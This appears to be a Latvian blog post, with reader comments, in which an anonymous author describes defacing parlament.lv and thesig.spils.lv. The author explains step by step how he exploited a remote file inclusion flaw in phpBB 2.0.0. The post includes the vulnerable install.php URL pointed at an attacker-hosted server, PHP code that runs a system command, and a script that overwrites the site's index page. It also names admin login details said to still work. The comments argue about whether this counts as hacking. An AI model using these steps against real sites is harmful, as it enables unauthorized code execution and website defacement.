parlament.lv un thesig.spils.lv hacked

Laikam jau vēsture atkārtojas. Šoreiz būs vēl viens stāsts no kādas anonīmas personas, kas pastāstīs par to cik vienkārši parasts interneta lietotājs var *uzlauzt* kādu lapu.

Hacked

Tika uzlauztas divas lapas parlament.lv – defaced un thesig.spils.lv – defaced kurās tika izmantots viens un tas pats forums. Turpinājumā būs aprakstīts, kā tas viss tika izdarīts.

Nezinu vai tas kādam palīdzēs, bet, tomēr gribētu dot vienu padomu. Jebkuru lapu var uzlauzt un vienīgais līdzeklis kā izsargāties no hakeriem ir atslēgt datoru no tīkla… bet var arī mēģināt mazināt risku un sekot līdzi izmantotās programmatūras jauninājumiem.

Garlaiciibas peec, sveetdienas dienaa seerfoju pa netu, un nejaushiibas
peec uzduuros saitam http://parlament.lv .
Lasot garlaiciigaas foruma zinjas un noskrollejot lapu liidz apakshai..
piepeshi ieraugu svariigo rindinju:

“Powered by phpBB 2.0.0 © 2001 phpBB Group”

Kaa nu neatcereeties, ka kaadu laiku atpakalj rokoties bugtrakaa bija maniiti tieshi shiis versijas caurumi.

Caurums1: administratora tiesiibu ieguushana forumaa.
Caurums2: scriptu exectoshana uz servera.

Process:
Caurums1: Siikaak nestaastiishu.. shaadu infu var dabuut netaa pa 10 min.
Izpilde: login=user1 ; password=user1 . //Savaadi, ka lapas deface jau ir izlabots, tachu shim juuzerim joprojaam ir admina tiesiibas.. Kas pirmais? 😉

Caurums2:

1) http://parlament.lv/install.php?phpbb_root_dir=/
Atbilde: Warning: Failed opening ‘/includes/functions_selects.php’ for inclusion (include_path=’.:/usr/local/lib/php’) in …

2) Izveidojam uz kaada no saviem/sveshiem/bezmaksas serveriem direktoriju includes , kura satur failu functions_selects.php
Sekojoshi: www.server.lv/includes/functions_selects.php

functions_selects.php saturs:
< ?
system(‘pwd’);
?>

3)
http://parlament.lv/install.php?phpbb_root_dir=http://www.someserver.lv/
atbilde apmeeram shaada: /home/parlament/forum

4) Mainam functions_selects.php saturu uz:

< ?
$filename = 'celsh uz index.php';
$somecontent = ""; //jaunaas lapas saturs :-)
$somecontent .= ""; //jaunaas lapas saturs :-)
$somecontent .= ""; //jaunaas lapas saturs :-)
if (!$fp = fopen($filename, 'w+')) {
print "Nevar atveert ($filename)";
exit;
}

// Raksta $somecontent iekshaa
if (!fwrite($fp, $somecontent)) {
print "Nevar rakstiit ieksh ($filename)";
exit;
}

print "Ierakstiiju ($somecontent) failaa ($filename)";

fclose($fp);

} else {
print "$filename nav rakstaams";
}
?>

4) Atkaartojam tresho darbiibu.
Atbildes variants #1 – “Ierakstiiju ($somecontent) failaa ($filename)”;
Atbildes variants #2 – “$filename nav rakstaams”;

Ko dariit ja ir atbildes variants #2, domaajiet pashi.. bet iespeeju ir daudz 🙂
Parlamentaa nostraadaaja variants #1.

By this bug:
http://parlament.lv
http://thesig.spils.lv

P.S. ES NEESMU HAKERIS. Es neesmu arii programmeetaajs. Uzskatu, ka par shitaadaam lietaam zinu loti maz. Tachu labpraat maacos visu jauno, un peec iespeejas censhos izmantot to ko zinu. – iistiem hakeriem luudzu neaplikt to, ko man paluudza uzrakstiit coolynx. Savaadaak shitais netiktu tapis.

P.P.S. Peec manaam domaam, exploitu izmantoshana nav hakera izpausme, bet ir tikai viduveejam interneta juuzerim, iistu hakeru uzraadiitais celsh uz normaalu adrenaliina devu 🙂
Uz redzi.

42 komentāri par “parlament.lv un thesig.spils.lv hacked

  1. MacDemon

    nu patiikami, ko es varu par shito teikt – iistie hakeri ir cilveecinji, kuri prot, ja vajg uzlauzt arii brutaali lauzhot, a taadas lietas kaa augstaak mineetaa tieshaam ir internetaa pilns un par vinjaam arii ir rakstiits daudz – taa nav hakoshana es pat nezinu kaa to iisti lai nosauc – kaukaada caurumu mekleeshana un izmantoshana.
    to anonymous: lieta ir sekojosha – tev nav nemaz jaabuut nekaadam briesmiigam programmeetaajam – vienkaarshi lasiit jaaprot – internetaa var atrast visu – arii to kaa izgatavot trotilu maajas apstaakljos nemaz neesot kjimikjim.

    Atbildēt
  2. Jānis Kāposts

    Šādus cilvēciņus, kas bezmērķīgi cūkojas apkārt pa Internetu sauc par script kiddies, jo viņi neko citu īpaši nemāk, kā tikai paņemt jau gatavus exploitus un pēc tam krutoties apkārt, ka viņi ir baigie l33t h4x0rs. Patiesībā Internetā viņi tiek pielīdzināti parastiem lamerim.

    Atbildēt
  3. Smooch

    Ir arii taadi cilveeki kaa Jaanis Kaaposts, kas ir kaapostaa dzimushi, pljavaa augushi, un tagad maak visus nolikt liidz ar zemi.

    Atbildēt
  4. Jānis Kāposts no lauku pļavas :)

    Smooch’iņ, tu tik briesmīgi neiespringsti. Man tā nejauši radās aizdomas, ka tu laikam esi viens no tiem skriptu puišeļiem, kuram briesmīgi neiepatikās, ja kāds viņu neuzskata par zupaah4x0r. Es jau nav tāds vienīgais meža bērns no kāpostu laukiem, kurš tā uzskata. Visa IT drošības industrija stāv aiz manis :)) Reāla cieņa rodas pret cilvēkiem, kas paši domā un štuko un exploito, nevis tikai Copy -> Paste un nospiež podziņu Exploit. Tā viš i…

    Atbildēt
  5. anoniims skats no malas

    Sveiki. Viss jau buutu dikti jauki, ja vien buutu kaada jeega no shiis niekoshanaas. Pashlaik taada dizhoshanaas vien skiet. Un veel jo vairaak dizhoshanaas taapec ka cilveki sho sauc par hakerismu un saka “es jau neesmu hakeris” – pag, pag neviens tevi nesauc par hakeri. Redziet, es esmu riktigs iesacejs un kad kaut ko nezinu njemu un palasu gramatinjas internetaa. Taa nu sanaaca vienreiz palasit rakstu gabalu kas ir hakers vai mosh vinsh saucaas kaa kluut par hakeri – jaa jaa tas pats viscaur cirkuleejoshais materiaals – kaadreiz taksh jaaizlasa ir tas ko iesaka ne tikai jaasaka tas ir labs. un taa izlasiiju to gabalu un noskaidroju ka hakeris ir tas kas pats buuvee a tas kas lauzh ir krakeris. Hakeris ir tikai un vieniigi ar plusa ziimi veerteejams elements datorpasaulee. Ja juus ar savu darbiibu kaut ko lauzhat laushanas peec tad labaak nenemiet mutee hakera vaardu. Un vissmiekligais man shitajaa situaacijaa skiet fakts, ka shim te interneta friikam kas izlasiijis par gluku netaa tiek pieversta tada uzmaniiba.

    Atbildēt
  6. DoubleD

    Rekur interesants log fails man te bij saruna – kuraa viss skaidrs: (+[LaT]Sacrosanct_Listniex) es saku:es neesu krakeris (+[LaT]Sacrosanct_Listniex) es vienkaarshi hakeris (Listniex) es saku:es neesu KRAKERIS (Listniex) es vienkaarshi HAKERIS (Listniex) nu vo (Listniex) bet (DoubleD) es reecu par to ka tu esi hakeris (Listniex) kaada ir ranja starp hakeri un krakeri zini? (Listniex) es raxtiiju apr to zinaatnisko darbu un dabuuju 1. vietu valstii (Listniex) un mans diploms ir apskataams ja netici http://81.198.16.140/kernel/pics.php?picture_id=2 gl hakot !

    Atbildēt
  7. japons

    Aa, starp citu es vakar pa raadzhu dzirdeeju, ka Laeims Galahers dabuujis taisnajaa. Palicis par paaris priekshzobiem nabagaaks un par paaris zilumiem biezaaks. Sorry adminam, ka tas viss nav po kjemu. BET fakts ir svariigs un apspriezhams

    Atbildēt
  8. Smooch

    Nevajag braukt ar izteicieniem, ka shitaa raksta izlikshana ir kautkaada dizhoshanaas.
    Es nosuutiiju coolynxam tikai .jpg.
    Vinsh mani paluudza aprakstiit, un es piekritu.
    Rubii?
    Pareizi coolynx teica: Kaada jeega no plikiem jpg failiem? (tad nebuutu nekaadas diskusijas). Bet dazhi tomeer nerubii neko!

    Atbildēt
  9. DoubleD

    NEE NEE NEE NAU MANS DIPLOMS.. da es nau vainiigs – es log failu iepostee a tas man te rindas neatdala un edit savu zinju arii nevar – to visu tur tas dzeks stasta.. es tak nezinaaju ka man pasham ar roku shitanii textaree veel jaaliek
    ! taaka to visu tas eliitais kex tur raxta! man nah nekadu diplomu nau .. nu vienigi dejoshanas :DDDD

    Atbildēt
  10. Kamazs

    Manupraat labaak, ka POdaa paraadaas shitaada informaacija nekaa shitaada informaacija tur neparaadaas. Var gudri spriest, tachu, sak ko grib, viskaut kas dziivee noder. Plus, nekur nemaniiju nekaadu dizho dizhoshanos. Un, btw, hakeris ir jau kljuvis par miitisku, legjendaaru terminu, kau kas liidziigs alkjimikjim vai burvim, kas iespeej vairaak kaa parasti cilveeki un ir apriikots ar peedeejaa kliedziena paardabiskaam speejaam computer-related area. Phe!

    Atbildēt
  11. ezis2a

    Ai kā es mīlu PHP! Un ar katru dienu jo vairāk!
    http://nite.l v/? page=/index
    Un nesaki, ka pats esi pasargāts no sveša koda includošanas. Nekad nekad. Varbūt palīdzēs ‘safe mode’?
    🙂

    Atbildēt
  12. coolynx

    Smooch: filtraacija ir tikai veel nav pietiekami laba. jaaizdomaa kaa, lai cheko urljus + aprauj, ja vajag, bet pashu adresi atstaaj cik taa gara ir un nocheko uz visaam *sliktaam* lietaam. neesmu pie taa visa kjeeries, bet to veel vajag…

    Atbildēt
  13. TheSig

    Mjaa.. Nu uzlauza, nu un tad. Ja tā paskatās, tad savu webu es uzturu tikai priekš tam lai dotu cilvēkiem informāciju par visu kas saitīts ar mobīlajiem telefoniem (forums caur kuru uzlauza) un dotu cilveekiem pieeju pie manas programmas “SIEMENS Organiser”. Tapēc lapas drošībai netiek pievērsts sevišķi daudz uzmanības, jau tā pietiekoši darba un pienākumu. Vienīgais ko šādā veidā uzlaužot var panākt t.i. web aizvēršanu (nu nav laika nodarboties vēl ar citu kļudu labošanu, tāda paša iemesla dēļ netiek rakstīts savējais foruma un portāla dzinulis), un tātad automātiski liegt citiem iespēju piekļūt pie informācijas, kura varētu būt viņiem noderīga.

    Atbildēt

Ieraksti komentāru

Tava e-pasta adrese netiks publicēta.